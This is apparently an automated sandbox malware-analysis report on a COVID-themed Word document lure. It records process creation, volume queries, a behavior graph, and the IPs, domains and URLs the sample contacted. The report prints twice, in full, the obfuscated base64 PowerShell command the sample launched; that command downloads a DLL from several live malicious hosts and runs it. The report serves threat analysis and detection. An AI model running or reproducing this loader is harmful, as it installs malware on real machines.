ApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338719 Sample: AG60273928I_COVID-19_SARS-C... Startdate: 12/01/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 11 other signatures 2->56 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 23 2->14         started        process3 signatures4 64 Suspicious powershell command line found 11->64 66 Very long command line found 11->66 68 Encrypted powershell cmdline option found 11->68 70 PowerShell case anomaly found 11->70 16 powershell.exe 12 9 11->16         started        21 msg.exe 11->21         started        process5 dnsIp6 40 mybusinessevent.com 185.2.4.29, 443, 49167, 49168 REGISTER_UK-ASGB Italy 16->40 42 shulovbaazar.com 51.79.161.36, 443, 49165, 49166 OVHFR Canada 16->42 44 2 other IPs or domains 16->44 38 C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll, PE32 16->38 dropped 58 Powershell drops PE file 16->58 23 rundll32.exe 16->23         started        file7 signatures8 process9 process10 25 rundll32.exe 2 23->25         started        signatures11 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->62 28 rundll32.exe 1 25->28         started        process12 signatures13 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->72 31 rundll32.exe 1 28->31         started        process14 signatures15 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->74 34 rundll32.exe 9 31->34         started        process16 dnsIp17 46 71.72.196.159, 80 TWC-10796-MIDWESTUS United States 34->46 48 69.49.88.46, 49171, 80 MPW-MACHLINK-NETUS United States 34->48 60 System process connects to network (likely due to code injection or exploit) 34->60 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
69.49.88.46
unknown United States
33734 MPW-MACHLINK-NETUS true
71.72.196.159
unknown United States
10796 TWC-10796-MIDWESTUS true
185.2.4.29
unknown Italy
203461 REGISTER_UK-ASGB true
152.32.168.168
unknown Hong Kong
135377 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK false
51.79.161.36
unknown Canada
16276 OVHFR true

Contacted Domains

Name IP Active
mybusinessevent.com 185.2.4.29 true
shulovbaazar.com 51.79.161.36 true
uhk.asiash.com 152.32.168.168 true
uhk.cncranes.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://uhk.cncranes.com/ErrorPages/3/ true
  • Avira URL Cloud: safe
unknown
http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/ true
  • Avira URL Cloud: safe
unknown